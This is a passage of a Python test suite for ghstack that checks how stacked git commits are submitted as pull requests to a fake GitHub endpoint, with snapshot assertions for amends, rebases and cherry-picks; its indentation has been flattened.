self.upstream_sh = ghstack.shell.Shell(cwd=upstream_dir, testing=True)
# I plan to fix this type error soon
self.github = ghstack.github_fake.FakeGitHubEndpoint(self.upstream_sh)
local_dir = tempfile.mkdtemp()
if GH_KEEP_TMP:
self.addCleanup(lambda: print("local_dir preserved at: {}".format(local_dir)))
else:
self.addCleanup(lambda: shutil.rmtree(local_dir))
self.sh = ghstack.shell.Shell(cwd=local_dir, testing=True)
self.sh.git("clone", upstream_dir, ".")
self.rev_map = {}
self.substituteRev(GitCommitHash("HEAD"), SubstituteRev("rINI0"))
def writeFileAndAdd(self, filename: str, contents: str) -> None:
with self.sh.open(filename, "w") as f:
f.write(contents)
self.sh.git("add", filename)
def lookupRev(self, substitute: str) -> GitCommitHash:
return self.rev_map[SubstituteRev(substitute)]
def substituteRev(self, rev: str, substitute: str) -> None:
# short doesn't really have to be here if we do substituteRev
h = GitCommitHash(self.sh.git("rev-parse", "--short", rev))
self.rev_map[SubstituteRev(substitute)] = h
print("substituteRev: {} = {}".format(substitute, h))
self.substituteExpected(h, substitute)
def gh(self, msg: str = 'Update',
update_fields: bool = False,
short: bool = False,
no_skip: bool = False) -> List[ghstack.submit.DiffMeta]:
return ghstack.submit.main(
msg=msg,
username='ezyang',
github=self.github,
sh=self.sh,
update_fields=update_fields,
stack_header='Stack',
repo_owner='pytorch',
repo_name='pytorch',
short=short,
no_skip=no_skip)
def gh_land(self) -> None:
return ghstack.land.main(
sh=self.sh
)
# TODO: pass arguments
def gh_unlink(self) -> None:
ghstack.unlink.main(
sh=self.sh
)
def dump_github(self) -> str:
r = self.github.graphql("""
query {
repository(name: "pytorch", owner: "pytorch") {
pullRequests {
nodes {
number
baseRefName
headRefName
title
body
}
}
}
}
""")
prs = []
refs = ""
for pr in r['data']['repository']['pullRequests']['nodes']:
pr['body'] = indent(pr['body'].replace('\r', ''), ' ')
pr['commits'] = self.upstream_sh.git("log", "--reverse", "--pretty=format:%h %s", pr["baseRefName"] + ".." + pr["headRefName"])
pr['commits'] = indent(pr['commits'], ' * ')
prs.append("#{number} {title} ({headRefName} -> {baseRefName})\n\n"
"{body}\n\n{commits}\n\n".format(**pr))
# TODO: Use of git --graph here is a bit of a loaded
# footgun, because git doesn't really give any guarantees
# about what the graph should look like. So there isn't
# really any assurance that this will output the same thing
# on multiple test runs. We'll have to reimplement this
# ourselves to do it right.
refs = self.upstream_sh.git("log", "--graph", "--oneline", "--branches=gh/*/*/head", "--decorate")
return "".join(prs) + "Repository state:\n\n" + indent(strip_trailing_whitespace(refs), ' ') + "\n\n"
# ------------------------------------------------------------------------- #
def test_simple(self) -> None:
print("####################")
print("### test_simple")
print("###")
print("### First commit")
self.writeFileAndAdd("a", "asdf")
self.sh.git("commit", "-m", "Commit 1\n\nThis is my first commit")
self.sh.test_tick()
self.gh('Initial 1')
self.substituteRev("HEAD", "rCOM1")
self.substituteRev("origin/gh/ezyang/1/head", "rMRG1")
self.assertExpected(self.dump_github(), '''\
#500 Commit 1 (gh/ezyang/1/head -> gh/ezyang/1/base)
Stack:
* **#500 Commit 1**
This is my first commit
* rMRG1 Commit 1
Repository state:
* rMRG1 (gh/ezyang/1/head) Commit 1
* rINI0 (HEAD -> master, gh/ezyang/1/base) Initial commit
''')
# Just to test what happens if we use those branches
self.sh.git("checkout", "gh/ezyang/1/orig")
print("###")
print("### Second commit")
self.writeFileAndAdd("b", "asdf")
self.sh.git("commit", "-m", "Commit 2\n\nThis is my second commit")
self.sh.test_tick()
self.gh('Initial 2')
self.substituteRev("HEAD", "rCOM2")
self.substituteRev("origin/gh/ezyang/2/head", "rMRG2")
self.assertExpected(self.dump_github(), '''\
#500 Commit 1 (gh/ezyang/1/head -> gh/ezyang/1/base)
Stack:
* #501 Commit 2
* **#500 Commit 1**
This is my first commit
* rMRG1 Commit 1
#501 Commit 2 (gh/ezyang/2/head -> gh/ezyang/2/base)
Stack:
* **#501 Commit 2**
* #500 Commit 1
This is my second commit
* rMRG2 Commit 2
Repository state:
* rMRG2 (gh/ezyang/2/head) Commit 2
* rMRG1 (gh/ezyang/2/base, gh/ezyang/1/head) Commit 1
* rINI0 (HEAD -> master, gh/ezyang/1/base) Initial commit
''')
# ------------------------------------------------------------------------- #
def test_empty_commit(self) -> None:
print("####################")
print("### test_empty_commit")
print("###")
print("### Empty commit")
self.sh.git("commit", "--allow-empty", "-m", "Commit 1\n\nThis is my first commit")
self.writeFileAndAdd("bar", "baz")
self.sh.git("commit", "-m", "Commit 2")
self.sh.test_tick()
self.gh('Initial')
self.substituteRev("HEAD", "rCOM1")
self.substituteRev("origin/gh/ezyang/1/head", "rMRG1")
self.assertExpected(self.dump_github(), '''\
#500 Commit 2 (gh/ezyang/1/head -> gh/ezyang/1/base)
Stack:
* **#500 Commit 2**
* rMRG1 Commit 2
Repository state:
* rMRG1 (gh/ezyang/1/head) Commit 2
* rINI0 (HEAD -> master, gh/ezyang/1/base) Initial commit
''')
# ------------------------------------------------------------------------- #
def test_commit_amended_to_empty(self) -> None:
print("####################")
print("### test_empty_commit")
print("###")
self.writeFileAndAdd("bar", "baz")
self.sh.git("commit", "-m", "Commit 1\n\nThis is my first commit")
self.sh.test_tick()
self.gh('Initial')
self.substituteRev("HEAD", "rCOM1")
self.substituteRev("origin/gh/ezyang/1/head", "rMRG1")
self.assertExpected(self.dump_github(), '''\
#500 Commit 1 (gh/ezyang/1/head -> gh/ezyang/1/base)
Stack:
* **#500 Commit 1**
This is my first commit
* rMRG1 Commit 1
Repository state:
* rMRG1 (gh/ezyang/1/head) Commit 1
* rINI0 (HEAD -> master, gh/ezyang/1/base) Initial commit
''')
self.sh.git('rm', 'bar')
self.sh.git("commit", "--amend", "--allow-empty")
self.sh.test_tick()
self.gh('Update')
self.assertExpected(self.dump_github(), '''\
#500 Commit 1 (gh/ezyang/1/head -> gh/ezyang/1/base)
Stack:
* **#500 Commit 1**
This is my first commit
* rMRG1 Commit 1
Repository state:
* rMRG1 (gh/ezyang/1/head) Commit 1
* rINI0 (HEAD -> master, gh/ezyang/1/base) Initial commit
''')
# ------------------------------------------------------------------------- #
def test_amend(self) -> None:
print("####################")
print("### test_amend")
print("###")
print("### First commit")
with self.sh.open("file1.txt", "w") as f:
f.write("A")
self.sh.git("add", "file1.txt")
self.sh.git("commit", "-m", "Commit 1\n\nA commit with an A")
self.sh.test_tick()
self.gh('Initial 1')
self.substituteRev("HEAD", "rCOM1")
self.substituteRev("origin/gh/ezyang/1/head", "rMRG1")
self.assertExpected(self.dump_github(), '''\
#500 Commit 1 (gh/ezyang/1/head -> gh/ezyang/1/base)
Stack:
* **#500 Commit 1**
A commit with an A
* rMRG1 Commit 1
Repository state:
* rMRG1 (gh/ezyang/1/head) Commit 1
* rINI0 (HEAD -> master, gh/ezyang/1/base) Initial commit
''')
print("###")
print("### Amend the commit")
with self.sh.open("file1.txt", "w") as f:
f.write("ABBA")
self.sh.git("add", "file1.txt")
# Can't use -m here, it will clobber the metadata
self.sh.git("commit", "--amend")
self.substituteRev("HEAD", "rCOM2")
self.sh.test_tick()
self.gh('Update A')
self.substituteRev("origin/gh/ezyang/1/head", "rMRG2")
self.assertExpected(self.dump_github(), '''\
#500 Commit 1 (gh/ezyang/1/head -> gh/ezyang/1/base)
Stack:
* **#500 Commit 1**
A commit with an A
* rMRG1 Commit 1
* rMRG2 Update A on "Commit 1"
Repository state:
* rMRG2 (gh/ezyang/1/head) Update A on "Commit 1"
* rMRG1 Commit 1
* rINI0 (HEAD -> master, gh/ezyang/1/base) Initial commit
''')
# ------------------------------------------------------------------------- #
def test_amend_message_only(self) -> None:
print("####################")
print("### test_amend")
print("###")
print("### First commit")
with self.sh.open("file1.txt", "w") as f:
f.write("A")
self.sh.git("add", "file1.txt")
self.sh.git("commit", "-m", "Commit 1\n\nA commit with an A")
self.sh.test_tick()
self.gh('Initial 1')
self.substituteRev("HEAD", "rCOM1")
self.substituteRev("origin/gh/ezyang/1/head", "rMRG1")
self.assertExpected(self.dump_github(), '''\
#500 Commit 1 (gh/ezyang/1/head -> gh/ezyang/1/base)
Stack:
* **#500 Commit 1**
A commit with an A
* rMRG1 Commit 1
Repository state:
* rMRG1 (gh/ezyang/1/head) Commit 1
* rINI0 (HEAD -> master, gh/ezyang/1/base) Initial commit
''')
print("###")
print("### Amend the commit")
# Can't use -m here, it will clobber the metadata
self.sh.git("filter-branch", "-f", "--msg-filter", "cat && echo 'blargle'", "HEAD~..HEAD")
self.substituteRev("HEAD", "rCOM2")
self.sh.test_tick()
self.gh('Update A', no_skip=True)
self.substituteRev("origin/gh/ezyang/1/head", "rMRG2")
self.assertExpected(self.dump_github(), '''\
#500 Commit 1 (gh/ezyang/1/head -> gh/ezyang/1/base)
Stack:
* **#500 Commit 1**
A commit with an A
* rMRG1 Commit 1
* rMRG2 Update A on "Commit 1"
Repository state:
* rMRG2 (gh/ezyang/1/head) Update A on "Commit 1"
* rMRG1 Commit 1
* rINI0 (HEAD -> master, gh/ezyang/1/base) Initial commit
''')
# ------------------------------------------------------------------------- #
def test_amend_out_of_date(self) -> None:
print("####################")
print("### test_amend_out_of_date")
print("###")
print("### First commit")
with self.sh.open("file1.txt", "w") as f:
f.write("A")
self.sh.git("add", "file1.txt")
self.sh.git("commit", "-m", "Commit 1\n\nA commit with an A")
self.sh.test_tick()
self.gh('Initial 1')
old_head = self.sh.git("rev-parse", "HEAD")
print("###")
print("### Amend the commit")
with self.sh.open("file1.txt", "w") as f:
f.write("ABBA")
self.sh.git("add", "file1.txt")
# Can't use -m here, it will clobber the metadata
self.sh.git("commit", "--amend")
self.sh.test_tick()
self.gh('Update A')
# Reset to the old version
self.sh.git("reset", "--hard", old_head)
with self.sh.open("file1.txt", "w") as f:
f.write("BAAB")
self.sh.git("add", "file1.txt")
# Can't use -m here, it will clobber the metadata
self.sh.git("commit", "--amend")
self.sh.test_tick()
self.assertRaises(RuntimeError, lambda: self.gh('Update B'))
# ------------------------------------------------------------------------- #
def test_multi(self) -> None:
print("####################")
print("### test_multi")
print("###")
print("### First commit")
with self.sh.open("file1.txt", "w") as f:
f.write("A")
self.sh.git("add", "file1.txt")
self.sh.git("commit", "-m", "Commit 1\n\nA commit with an A")
self.sh.test_tick()
print("###")
print("### Second commit")
with self.sh.open("file2.txt", "w") as f:
f.write("B")
self.sh.git("add", "file2.txt")
self.sh.git("commit", "-m", "Commit 2\n\nA commit with a B")
self.sh.test_tick()
self.gh('Initial 1 and 2')
self.substituteRev("HEAD~", "rCOM1")
self.substituteRev("HEAD", "rCOM2")
self.substituteRev("origin/gh/ezyang/1/head", "rMRG1")
self.substituteRev("origin/gh/ezyang/2/head", "rMRG2")
self.assertExpected(self.dump_github(), '''\
#500 Commit 1 (gh/ezyang/1/head -> gh/ezyang/1/base)
Stack:
* #501 Commit 2
* **#500 Commit 1**
A commit with an A
* rMRG1 Commit 1
#501 Commit 2 (gh/ezyang/2/head -> gh/ezyang/2/base)
Stack:
* **#501 Commit 2**
* #500 Commit 1
A commit with a B
* rMRG2 Commit 2
Repository state:
* rMRG2 (gh/ezyang/2/head) Commit 2
* rMRG1 (gh/ezyang/2/base, gh/ezyang/1/head) Commit 1
* rINI0 (HEAD -> master, gh/ezyang/1/base) Initial commit
''')
# ------------------------------------------------------------------------- #
def test_amend_top(self) -> None:
print("####################")
print("### test_amend_top")
print("###")
print("### First commit")
with self.sh.open("file1.txt", "w") as f:
f.write("A")
self.sh.git("add", "file1.txt")
self.sh.git("commit", "-m", "Commit 1\n\nA commit with an A")
self.sh.test_tick()
self.gh('Initial 1')
self.substituteRev("HEAD", "rCOM1")
self.substituteRev("origin/gh/ezyang/1/head", "rMRG1")
print("###")
print("### Second commit")
with self.sh.open("file2.txt", "w") as f:
f.write("B")
self.sh.git("add", "file2.txt")
self.sh.git("commit", "-m", "Commit 2\n\nA commit with a B")
self.sh.test_tick()
self.gh('Initial 2')
self.substituteRev("HEAD", "rCOM2")
self.substituteRev("origin/gh/ezyang/2/head", "rMRG2")
self.assertExpected(self.dump_github(), '''\
#500 Commit 1 (gh/ezyang/1/head -> gh/ezyang/1/base)
Stack:
* #501 Commit 2
* **#500 Commit 1**
A commit with an A
* rMRG1 Commit 1
#501 Commit 2 (gh/ezyang/2/head -> gh/ezyang/2/base)
Stack:
* **#501 Commit 2**
* #500 Commit 1
A commit with a B
* rMRG2 Commit 2
Repository state:
* rMRG2 (gh/ezyang/2/head) Commit 2
* rMRG1 (gh/ezyang/2/base, gh/ezyang/1/head) Commit 1
* rINI0 (HEAD -> master, gh/ezyang/1/base) Initial commit
''')
print("###")
print("### Amend the top commit")
with self.sh.open("file2.txt", "w") as f:
f.write("BAAB")
self.sh.git("add", "file2.txt")
# Can't use -m here, it will clobber the metadata
self.sh.git("commit", "--amend")
self.substituteRev("HEAD", "rCOM2A")
self.sh.test_tick()
self.gh('Update A')
self.substituteRev("origin/gh/ezyang/2/head", "rMRG2A")
self.assertExpected(self.dump_github(), '''\
#500 Commit 1 (gh/ezyang/1/head -> gh/ezyang/1/base)
Stack:
* #501 Commit 2
* **#500 Commit 1**
A commit with an A
* rMRG1 Commit 1
#501 Commit 2 (gh/ezyang/2/head -> gh/ezyang/2/base)
Stack:
* **#501 Commit 2**
* #500 Commit 1
A commit with a B
* rMRG2 Commit 2
* rMRG2A Update A on "Commit 2"
Repository state:
* rMRG2A (gh/ezyang/2/head) Update A on "Commit 2"
* rMRG2 Commit 2
* rMRG1 (gh/ezyang/2/base, gh/ezyang/1/head) Commit 1
* rINI0 (HEAD -> master, gh/ezyang/1/base) Initial commit
''')
# ------------------------------------------------------------------------- #
def test_amend_bottom(self) -> None:
print("####################")
print("### test_amend_bottom")
print("###")
print("### First commit")
with self.sh.open("file1.txt", "w") as f:
f.write("A")
self.sh.git("add", "file1.txt")
self.sh.git("commit", "-m", "Commit 1\n\nA commit with an A")
self.sh.test_tick()
self.gh('Initial 1')
self.substituteRev("HEAD", "rCOM1")
self.substituteRev("origin/gh/ezyang/1/head", "rMRG1")
print("###")
print("### Second commit")
with self.sh.open("file2.txt", "w") as f:
f.write("B")
self.sh.git("add", "file2.txt")
self.sh.git("commit", "-m", "Commit 2\n\nA commit with a B")
self.sh.test_tick()
self.gh('Initial 2')
self.substituteRev("HEAD", "rCOM2")
self.substituteRev("origin/gh/ezyang/2/head", "rMRG2")
self.assertExpected(self.dump_github(), '''\
#500 Commit 1 (gh/ezyang/1/head -> gh/ezyang/1/base)
Stack:
* #501 Commit 2
* **#500 Commit 1**
A commit with an A
* rMRG1 Commit 1
#501 Commit 2 (gh/ezyang/2/head -> gh/ezyang/2/base)
Stack:
* **#501 Commit 2**
* #500 Commit 1
A commit with a B
* rMRG2 Commit 2
Repository state:
* rMRG2 (gh/ezyang/2/head) Commit 2
* rMRG1 (gh/ezyang/2/base, gh/ezyang/1/head) Commit 1
* rINI0 (HEAD -> master, gh/ezyang/1/base) Initial commit
''')
print("###")
print("### Amend the bottom commit")
self.sh.git("checkout", "HEAD~")
with self.sh.open("file1.txt", "w") as f:
f.write("ABBA")
self.sh.git("add", "file1.txt")
# Can't use -m here, it will clobber the metadata
self.sh.git("commit", "--amend")
self.substituteRev("HEAD", "rCOM1A")
self.sh.test_tick()
self.gh('Update A')
self.substituteRev("origin/gh/ezyang/1/head", "rMRG1A")
self.assertExpected(self.dump_github(), '''\
#500 Commit 1 (gh/ezyang/1/head -> gh/ezyang/1/base)
Stack:
* **#500 Commit 1**
A commit with an A
* rMRG1 Commit 1
* rMRG1A Update A on "Commit 1"
#501 Commit 2 (gh/ezyang/2/head -> gh/ezyang/2/base)
Stack:
* **#501 Commit 2**
* #500 Commit 1
A commit with a B
* rMRG2 Commit 2
Repository state:
* rMRG1A (gh/ezyang/1/head) Update A on "Commit 1"
| * rMRG2 (gh/ezyang/2/head) Commit 2
|/
* rMRG1 (gh/ezyang/2/base) Commit 1
* rINI0 (HEAD -> master, gh/ezyang/1/base) Initial commit
''')
print("###")
print("### Restack the top commit")
self.sh.git("cherry-pick", self.lookupRev("rCOM2"))
self.sh.test_tick()
self.gh('Update B')
self.substituteRev("HEAD", "rCOM2A")
self.substituteRev("origin/gh/ezyang/2/head", "rMRG2A")
self.assertExpected(self.dump_github(), '''\
#500 Commit 1 (gh/ezyang/1/head -> gh/ezyang/1/base)
Stack:
* #501 Commit 2
* **#500 Commit 1**
A commit with an A
* rMRG1 Commit 1
* rMRG1A Update A on "Commit 1"
#501 Commit 2 (gh/ezyang/2/head -> gh/ezyang/2/base)
Stack:
* **#501 Commit 2**
* #500 Commit 1
A commit with a B
* rMRG2 Commit 2
* rMRG2A Update B on "Commit 2"
Repository state:
* rMRG2A (gh/ezyang/2/head) Update B on "Commit 2"
|\\
| * rMRG1A (gh/ezyang/2/base, gh/ezyang/1/head) Update A on "Commit 1"
* | rMRG2 Commit 2
|/
* rMRG1 Commit 1
* rINI0 (HEAD -> master, gh/ezyang/1/base) Initial commit
''')
# ------------------------------------------------------------------------- #
def test_amend_all(self) -> None:
print("####################")
print("### test_amend_all")
print("###")
print("### First commit")
with self.sh.open("file1.txt", "w") as f:
f.write("A")
self.sh.git("add", "file1.txt")
self.sh.git("commit", "-m", "Commit 1\n\nA commit with an A")
self.sh.test_tick()
self.gh('Initial 1')
self.substituteRev("HEAD", "rCOM1")
self.substituteRev("origin/gh/ezyang/1/head", "rMRG1")
print("###")
print("### Second commit")
with self.sh.open("file2.txt", "w") as f:
f.write("B")
self.sh.git("add", "file2.txt")
self.sh.git("commit", "-m", "Commit 2\n\nA commit with a B")
self.sh.test_tick()
self.gh('Initial 2')
self.substituteRev("HEAD", "rCOM2")
self.substituteRev("origin/gh/ezyang/2/head", "rMRG2")
self.assertExpected(self.dump_github(), '''\
#500 Commit 1 (gh/ezyang/1/head -> gh/ezyang/1/base)
Stack:
* #501 Commit 2
* **#500 Commit 1**
A commit with an A
* rMRG1 Commit 1
#501 Commit 2 (gh/ezyang/2/head -> gh/ezyang/2/base)
Stack:
* **#501 Commit 2**
* #500 Commit 1
A commit with a B
* rMRG2 Commit 2
Repository state:
* rMRG2 (gh/ezyang/2/head) Commit 2
* rMRG1 (gh/ezyang/2/base, gh/ezyang/1/head) Commit 1
* rINI0 (HEAD -> master, gh/ezyang/1/base) Initial commit
''')
print("###")
print("### Amend the commits")
self.sh.git("checkout", "HEAD~")
with self.sh.open("file1.txt", "w") as f:
f.write("ABBA")
self.sh.git("add", "file1.txt")
# Can't use -m here, it will clobber the metadata
self.sh.git("commit", "--amend")
self.substituteRev("HEAD", "rCOM1A")
self.sh.test_tick()
self.sh.git("cherry-pick", self.lookupRev("rCOM2"))
self.substituteRev("HEAD", "rCOM2A")
self.sh.test_tick()
self.gh('Update A')
self.substituteRev("origin/gh/ezyang/1/head", "rMRG1A")
self.substituteRev("origin/gh/ezyang/2/head", "rMRG2A")
self.assertExpected(self.dump_github(), '''\
#500 Commit 1 (gh/ezyang/1/head -> gh/ezyang/1/base)
Stack:
* #501 Commit 2
* **#500 Commit 1**
A commit with an A
* rMRG1 Commit 1
* rMRG1A Update A on "Commit 1"
#501 Commit 2 (gh/ezyang/2/head -> gh/ezyang/2/base)
Stack:
* **#501 Commit 2**
* #500 Commit 1
A commit with a B
* rMRG2 Commit 2
* rMRG2A Update A on "Commit 2"
Repository state:
* rMRG2A (gh/ezyang/2/head) Update A on "Commit 2"
|\\
| * rMRG1A (gh/ezyang/2/base, gh/ezyang/1/head) Update A on "Commit 1"
* | rMRG2 Commit 2
|/
* rMRG1 Commit 1
* rINI0 (HEAD -> master, gh/ezyang/1/base) Initial commit
''')
# ------------------------------------------------------------------------- #
def test_rebase(self) -> None:
print("####################")
print("### test_rebase")
self.sh.git("checkout", "-b", "feature")
print("###")
print("### First commit")
with self.sh.open("file1.txt", "w") as f:
f.write("A")
self.sh.git("add", "file1.txt")
self.sh.git("commit", "-m", "Commit 1\n\nA commit with an A")
self.sh.test_tick()
self.gh('Initial 1')
self.substituteRev("HEAD", "rCOM1")
self.substituteRev("origin/gh/ezyang/1/head", "rMRG1")
print("###")
print("### Second commit")
with self.sh.open("file2.txt", "w") as f:
f.write("B")
self.sh.git("add", "file2.txt")
self.sh.git("commit", "-m", "Commit 2\n\nA commit with a B")
self.sh.test_tick()
self.gh('Initial 2')
self.substituteRev("HEAD", "rCOM2")
self.substituteRev("origin/gh/ezyang/2/head", "rMRG2")
self.assertExpected(self.dump_github(), '''\
#500 Commit 1 (gh/ezyang/1/head -> gh/ezyang/1/base)
Stack:
* #501 Commit 2
* **#500 Commit 1**
A commit with an A
* rMRG1 Commit 1
#501 Commit 2 (gh/ezyang/2/head -> gh/ezyang/2/base)
Stack:
* **#501 Commit 2**
* #500 Commit 1
A commit with a B
* rMRG2 Commit 2
Repository state:
* rMRG2 (gh/ezyang/2/head) Commit 2
* rMRG1 (gh/ezyang/2/base, gh/ezyang/1/head) Commit 1
* rINI0 (HEAD -> master, gh/ezyang/1/base) Initial commit
''')
print("###")
print("### Push master forward")
self.sh.git("checkout", "master")
with self.sh.open("master.txt", "w") as f:
f.write("M")
self.sh.git("add", "master.txt")
self.sh.git("commit", "-m", "Master commit 1\n\nA commit with a M")
self.substituteRev("HEAD", "rINI2")
self.sh.test_tick()
self.sh.git("push", "origin", "master")
print("###")
print("### Rebase the commits")
self.sh.git("checkout", "feature")
self.sh.git("rebase", "origin/master")
self.substituteRev("HEAD", "rCOM2A")
self.substituteRev("HEAD~", "rCOM1A")
self.gh('Rebase')
self.substituteRev("origin/gh/ezyang/1/head", "rMRG1A")
self.substituteRev("origin/gh/ezyang/2/head", "rMRG2A")
self.assertExpected(self.dump_github(), '''\
#500 Commit 1 (gh/ezyang/1/head -> gh/ezyang/1/base)
Stack:
* #501 Commit 2
* **#500 Commit 1**
A commit with an A
* rMRG1 Commit 1
* rMRG1A Rebase on "Commit 1"
#501 Commit 2 (gh/ezyang/2/head -> gh/ezyang/2/base)
Stack:
* **#501 Commit 2**
* #500 Commit 1
A commit with a B
* rMRG2 Commit 2
* rMRG2A Rebase on "Commit 2"
Repository state:
* rMRG2A (gh/ezyang/2/head) Rebase on "Commit 2"
|\\
| * rMRG1A (gh/ezyang/2/base, gh/ezyang/1/head) Rebase on "Commit 1"
| |\\
| | * rINI2 (HEAD -> master, gh/ezyang/1/base) Master commit 1
* | | rMRG2 Commit 2
|/ /
* | rMRG1 Commit 1
|/
* rINI0 Initial commit
''')
# ------------------------------------------------------------------------- #
def test_cherry_pick(self) -> None:
print("####################")
print("### test_cherry_pick")
self.sh.git("checkout", "-b", "feature")
print("###")
print("### First commit")
with self.sh.open("file1.txt", "w") as f:
f.write("A")
self.sh.git("add", "file1.txt")
self.sh.git("commit", "-m", "Commit 1\n\nA commit with an A")
self.sh.test_tick()
self.gh('Initial 1')
self.substituteRev("HEAD", "rCOM1")
self.substituteRev("origin/gh/ezyang/1/head", "rMRG1")
print("###")
print("### Second commit")
with self.sh.open("file2.txt", "w") as f:
f.write("B")
self.sh.git("add", "file2.txt")
self.sh.git("commit", "-m", "Commit 2\n\nA commit with a B")
self.sh.test_tick()
self.gh('Initial 2')
self.substituteRev("HEAD", "rCOM2")
self.substituteRev("origin/gh/ezyang/2/head", "rMRG2")
self.assertExpected(self.dump_github(), '''\
#500 Commit 1 (gh/ezyang/1/head -> gh/ezyang/1/base)
Stack:
* #501 Commit 2
* **#500 Commit 1**
A commit with an A
* rMRG1 Commit 1
#501 Commit 2 (gh/ezyang/2/head -> gh/ezyang/2/base)
Stack:
* **#501 Commit 2**
* #500 Commit 1
A commit with a B
* rMRG2 Commit 2
Repository state:
* rMRG2 (gh/ezyang/2/head) Commit 2
* rMRG1 (gh/ezyang/2/base, gh/ezyang/1/head) Commit 1
* rINI0 (HEAD -> master, gh/ezyang/1/base) Initial commit
''')
print("###")
print("### Push master forward")
self.sh.git("checkout", "master")
with self.sh.open("master.txt", "w") as f:
f.write("M")
self.sh.git("add", "master.txt")
self.sh.git("commit", "-m", "Master commit 1\n\nA commit with a M")
self.substituteRev("HEAD", "rINI2")
self.sh.test_tick()
self.sh.git("push", "origin", "master")
print("###")
print("### Cherry-pick the second commit")
self.sh.git("cherry-pick", "feature")
self.substituteRev("HEAD", "rCOM2A")
self.gh('Cherry pick')
self.substituteRev("origin/gh/ezyang/2/base", "rINI2A")
self.substituteRev("origin/gh/ezyang/2/head", "rMRG2A")
self.assertExpected(self.dump_github(), '''\
#500 Commit 1 (gh/ezyang/1/head -> gh/ezyang/1/base)
Stack:
* #501 Commit 2
* **#500 Commit 1**
A commit with an A
* rMRG1 Commit 1
#501 Commit 2 (gh/ezyang/2/head -> gh/ezyang/2/base)
Stack:
* **#501 Commit 2**
A commit with a B
* rMRG2 Commit 2
* rMRG2A Cherry pick on "Commit 2"
Repository state:
* rMRG2A (gh/ezyang/2/head) Cherry pick on "Commit 2"
|\\
| * rINI2A (gh/ezyang/2/base) Update base for Cherry pick on "Commit 2"
| |\\
| | * rINI2 (HEAD -> master) Master commit 1
* | | rMRG2 Commit 2
|/ /
* | rMRG1 (gh/ezyang/1/head) Commit 1
|/
* rINI0 (gh/ezyang/1/base) Initial commit
''')
# ------------------------------------------------------------------------- #
def test_no_clobber(self) -> None:
# Check that we don't clobber changes to PR description or title
print("####################")
print("### test_no_clobber")
self.writeFileAndAdd("b", "asdf")
self.sh.git("commit", "-m", "Commit 1\n\nOriginal message")
self.sh.test_tick()
self.gh('Initial 1')
self.sh.test_tick()
self.substituteRev("HEAD", "rCOM1")
self.substituteRev("origin/gh/ezyang/1/head", "rMRG1")
self.assertExpected(self.dump_github(), '''\
#500 Commit 1 (gh/ezyang/1/head -> gh/ezyang/1/base)
Stack:
* **#500 Commit 1**
Original message
* rMRG1 Commit 1
Repository state:
* rMRG1 (gh/ezyang/1/head) Commit 1
* rINI0 (HEAD -> master, gh/ezyang/1/base) Initial commit
''')
print("###")
print("### Amend the PR")
self.github.patch("repos/pytorch/pytorch/pulls/500",
body="""\
Stack:
* **#500 Commit 1**
Directly updated message body""",
title="Directly updated title")
self.assertExpected(self.dump_github(), '''\
#500 Directly updated title (gh/ezyang/1/head -> gh/ezyang/1/base)
Stack:
* **#500 Commit 1**
Directly updated message body
* rMRG1 Commit 1
Repository state:
* rMRG1 (gh/ezyang/1/head) Commit 1
* rINI0 (HEAD -> master, gh/ezyang/1/base) Initial commit
''')
print("###")
print("### Submit an update")
with self.sh.open("file1.txt", "w") as f:
f.write("A")
self.sh.git("add", "file1.txt")
self.sh.git("commit", "--amend")
self.sh.test_tick()
self.gh('Update 1')
self.sh.test_tick()
self.substituteRev("HEAD", "rCOM2")
self.substituteRev("origin/gh/ezyang/1/head", "rMRG2")
self.assertExpected(self.dump_github(), '''\
#500 Directly updated title (gh/ezyang/1/head -> gh/ezyang/1/base)
Stack:
* **#500 Directly updated title**
Directly updated message body
* rMRG1 Commit 1
* rMRG2 Update 1 on "Directly updated title"
Repository state:
* rMRG2 (gh/ezyang/1/head) Update 1 on "Directly updated title"
* rMRG1 Commit 1
* rINI0 (HEAD -> master, gh/ezyang/1/base) Initial commit
''')
# ------------------------------------------------------------------------- #
def test_no_clobber_carriage_returns(self) -> None:
# In some situations, GitHub will replace your newlines with
# \r\n. Check we handle this correctly.
print("####################")
print("### test_no_clobber_carriage_returns")
self.writeFileAndAdd("b", "asdf")
self.sh.git("commit", "-m", "Commit 1\n\nOriginal message")
self.sh.test_tick()
self.gh('Initial 1')
self.sh.test_tick()
self.substituteRev("HEAD", "rCOM1")
self.substituteRev("origin/gh/ezyang/1/head", "rMRG1")
self.assertExpected(self.dump_github(), '''\
#500 Commit 1 (gh/ezyang/1/head -> gh/ezyang/1/base)
Stack:
* **#500 Commit 1**
Original message
* rMRG1 Commit 1
Repository state:
* rMRG1 (gh/ezyang/1/head) Commit 1
* rINI0 (HEAD -> master, gh/ezyang/1/base) Initial commit
''')
print("###")
print("### Amend the PR")
self.github.patch("repos/pytorch/pytorch/pulls/500",
body="""\
Stack:
* **#500 Commit 1**
Directly updated message body""".replace('\n', '\r\n'),
title="Directly updated title")
print("###")
print("### Submit a new commit")
with self.sh.open("file1.txt", "w") as f:
f.write("A")
self.sh.git("add", "file1.txt")
self.sh.git("commit", "-m", "Commit 2")
self.sh.test_tick()
self.gh('Initial 2')
self.sh.test_tick()
self.substituteRev("HEAD", "rCOM2")
self.substituteRev("origin/gh/ezyang/2/head", "rMRG2")
self.assertExpected(self.dump_github(), '''\
#500 Directly updated title (gh/ezyang/1/head -> gh/ezyang/1/base)
Stack:
* #501 Commit 2
* **#500 Directly updated title**
Directly updated message body
* rMRG1 Commit 1
#501 Commit 2 (gh/ezyang/2/head -> gh/ezyang/2/base)
Stack:
* **#501 Commit 2**
* #500 Directly updated title
* rMRG2 Commit 2
Repository state:
* rMRG2 (gh/ezyang/2/head) Commit 2
* rMRG1 (gh/ezyang/2/base, gh/ezyang/1/head) Commit 1
* rINI0 (HEAD -> master, gh/ezyang/1/base) Initial commit
''')
# ------------------------------------------------------------------------- #
def test_update_fields(self) -> None:
# Check that we do clobber fields when explicitly asked
print("####################")
print("### test_update_fields")
self.writeFileAndAdd("b", "asdf")
self.sh.git("commit", "-m", "Commit 1\n\nOriginal message")
self.sh.test_tick()
self.gh('Initial 1')
self.sh.test_tick()
self.substituteRev("HEAD", "rCOM1")
self.substituteRev("origin/gh/ezyang/1/head", "rMRG1")
self.assertExpected(self.dump_github(), '''\
#500 Commit 1 (gh/ezyang/1/head -> gh/ezyang/1/base)
Stack:
* **#500 Commit 1**
Original message
* rMRG1 Commit 1
Repository state:
* rMRG1 (gh/ezyang/1/head) Commit 1
* rINI0 (HEAD -> master, gh/ezyang/1/base) Initial commit
''')
print("###")
print("### Amend the PR")
